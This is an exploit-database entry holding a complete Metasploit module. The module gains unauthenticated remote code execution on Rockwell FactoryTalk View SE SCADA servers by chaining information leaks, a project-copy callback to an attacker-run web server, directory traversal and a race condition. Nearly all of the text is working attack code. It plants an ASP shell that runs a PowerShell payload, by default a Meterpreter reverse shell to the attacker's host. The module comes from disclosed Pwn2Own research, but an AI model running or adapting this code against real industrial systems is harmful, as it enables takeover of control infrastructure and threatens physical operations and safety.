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Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution Exploit

Author
radek.domanski@gmail.com
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-35294
Category
remote exploits
Date add
20-11-2020
CVE
CVE-2020-12027
CVE-2020-12028
CVE-2020-12029
Platform
windows
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution
          on the Rockwell FactoryTalk View SE SCADA product as the IIS user.
          The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request,
          the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all
          targets, two information leak vulnerabilities are also abused.
          This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.
        },
        'License' => MSF_LICENSE,
        'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
          'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
        'References' =>
          [
            [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'],
            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'],
            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'],
            [ 'CVE', '2020-12027'],
            [ 'CVE', '2020-12028'],
            [ 'CVE', '2020-12029'],
            [ 'ZDI', '20-727'],
            [ 'ZDI', '20-728'],
            [ 'ZDI', '20-729'],
            [ 'ZDI', '20-730'],
          ],
        'Privileged' => false,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Payload' => {
          'DefaultOptions' =>
            {
              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
            }
        },
        'DefaultOptions' => { 'WfsDelay' => 20 },
        'Targets' =>
          [
            [ 'Rockwell Automation FactoryTalk SE', {} ]
          ],
        'DisclosureDate' => '2020-06-22',
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']),
        OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]),
        OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/'])
      ]
    )

    register_advanced_options(
      [
        OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
      ]
    )
  end

  def send_to_factory(path)
    send_request_cgi({
      'uri' => normalize_uri(target_uri, path),
      'method' => 'GET'
    })
  end

  def check
    res = send_to_factory('/hmi_isapi.dll')
    return Exploit::CheckCode::Safe unless res && res.code == 200

    # Parse version from response body
    # Example: Version 11.00.00.230
    version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

    # Is returned version sound?
    unless version.empty?
      if version.length != 4
        return Exploit::CheckCode::Detected
      end

      print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
      if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
        # we know this exact version is vulnerable (11.00.00.230)
        return Exploit::CheckCode::Appears
      end

      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Unknown
  end

  def on_request_uri(cli, request)
    if request.uri.include?(@shelly)
      print_good("#{peer} - Target connected, sending payload")
      psh = cmd_psh_payload(
        payload.encoded,
        payload.arch.first
        # without comspec it seems to fail, so keep it this way
        # remove_comspec: true
      )
      # add double quotes for classic ASP escaping
      psh.gsub!('"', '""')

      # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell
      # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore...
      # If this module is not working on an older Windows version, try the below as payload:
      # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)
      payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>}
      send_response(cli, payload)
      # payload file is deleted automatically by the server once we win the race!

    elsif request.uri.include?(@proj_name)
      # Directory traversal: vulnerable asp file will land in the path we provide
      print_good("#{peer} - Target connected, sending file path with dir traversal")
      # Check the comments in the Infoleak 2 (project installation path) to understand why
      filename = "../SE/HMI Projects/#{@shelly}"
      send_response(cli, filename)
    end
  end

  def exploit
    # Infoleak 1 (project listing)
    print_status("#{peer} - Listing projects on the server")
    res = send_to_factory('/hmi_isapi.dll?GetHMIProjects')

    fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless
      res && res.code == 200 && res.body.include?('HMIProject')

    print_status("#{peer} - Received list of projects from the server")
    @proj_name = nil
    proj_path = ''
    xml = res.get_xml_document

    # Parse XML project list and check each project for installation project path
    xml.search('HMIProject').each do |project|
      # Infoleak 2 (project installation path)
      # In the original exploit, we used this to calculate the directory traversal path, but
      # Google says the path is the same for all versions since at least 2007.
      # Let's still abuse it to check if the project is valid.
      url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}"
      res = send_to_factory(url)

      proj_path = res.body.strip

      # Check if response contains :\ that indicates a windows path
      next unless proj_path.include?(':\\')

      print_status("#{peer} - Found project path: #{proj_path}")

      # We only need first hit so we can quit the project parsing once we get it
      if project.attributes['Name']
        @proj_name = project.attributes['Name']
        break
      end
    end

    if !@proj_name
      fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...')
    end

    shell_path = proj_path.sub(@proj_name, '').strip
    print_good("#{peer} - Got a path to drop our shell: #{shell_path}")

    # Start http server for project copy callback
    http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
    print_status("#{peer} - Starting up our web service on #{http_service} ...")

    start_service({ 'Uri' => {
      'Proc' => proc do |cli, req|
        on_request_uri(cli, req)
      end,
      # This path has to be capitalized as "RSViewSE" or else the exploit will fail!
      'Path' => '/RSViewSE/'
    } })

    # Race Condition
    # This is the racer thread. It will continuously access our asp file until it gets executed
    print_status("#{peer} - Starting racer thread, let's win this race condition!")
    @shelly = "#{rand_text_alpha(5..10)}.asp"
    racer = Thread.new do
      loop do
        res = send_to_factory("/#{@shelly}")
        if res.code == 200
          print_good("#{peer} - We've won the race condition, shell incoming!")
          break
        end
      end
    end

    # Project Copy Request: target will connect to us to obtain project information.
    print_status("#{peer} - Initiating project copy request...")
    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
    res = send_to_factory(url)

    # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish
    count = 0
    while count < datastore['SLEEP_RACER']
      break if racer.status == false

      sleep(1)
      count += 1
    end
    racer.exit
  end
end

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